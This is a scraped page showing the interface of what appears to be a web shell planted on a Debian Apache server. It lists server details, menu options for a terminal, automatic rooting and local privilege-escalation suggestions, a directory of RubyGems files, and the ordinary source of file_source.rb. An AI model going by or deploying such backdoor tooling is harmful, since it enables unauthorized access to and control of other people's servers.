Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
ruby /
3.1.0 /
rubygems /
package /
Delete
Unzip
Name
Size
Permission
Date
Action
tar_reader
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
digest_io.rb
1.33
KB
-rw-r--r--
2022-04-12 11:11
file_source.rb
609
B
-rw-r--r--
2022-04-12 11:11
io_source.rb
813
B
-rw-r--r--
2022-04-12 11:11
old.rb
3.63
KB
-rw-r--r--
2022-04-12 11:11
source.rb
71
B
-rw-r--r--
2022-04-12 11:11
tar_header.rb
5.9
KB
-rw-r--r--
2022-04-12 11:11
tar_reader.rb
2.35
KB
-rw-r--r--
2022-04-12 11:11
tar_writer.rb
7.51
KB
-rw-r--r--
2022-04-12 11:11
Save
Rename
# frozen_string_literal: true ## # The primary source of gems is a file on disk, including all usages # internal to rubygems. # # This is a private class, do not depend on it directly. Instead, pass a path # object to `Gem::Package.new`. class Gem::Package::FileSource < Gem::Package::Source # :nodoc: all attr_reader :path def initialize(path) @path = path end def start @start ||= File.read path, 20 end def present? File.exist? path end def with_write_io(&block) File.open path, 'wb', &block end def with_read_io(&block) File.open path, 'rb', &block end end